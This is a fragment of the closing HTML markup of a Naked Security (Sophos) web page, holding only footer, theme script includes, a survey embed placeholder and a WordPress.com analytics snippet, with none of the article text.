				"link":"/cookies-and-scripts",
				"theme":"https://nakedsecurity.sophos.com/wp-content/themes/sophosnews-2015/css/sophos.css"};
		</script>
	</footer><!-- #colophon -->
</div><!-- #page -->
<div id="survey-wrapper" class="mfp-hide"><div class="pd-embed" id="pd_1499706777" data-settings=""></div></div>
<script id='child-js-plugins-js-extra'>
var PG8Data = {"startPage":"1","maxPages":"0","nextLink":""};
</script>
<script id='child-js-core-js-extra'>
var Sophos = {"ajaxurl":"https:\/\/nakedsecurity.sophos.com\/wp-admin\/admin-ajax.php","nonce":"671447dc73"};
</script>
<script type="text/javascript" src="https://nakedsecurity.sophos.com/_static/??/wp-content/themes/sophosnews-2015/js/plugins.js,/wp-content/themes/sophosnews-2015/js/core.js?m=1668553642j" ></script>	<script src='https://stats.wp.com/e-202246.js' defer></script>
	<script>
		_stq = window._stq || [];
		_stq.push([ 'view', {v:'ext',blog:'166161173',post:'804269',tz:'0',srv:'nakedsecurity.sophos.com',hp:'vip',j:'1:11.5.1'} ]);
		_stq.push([ 'clickTrackerInit', '166161173', '804269' ]);
	</script></body>
</html>
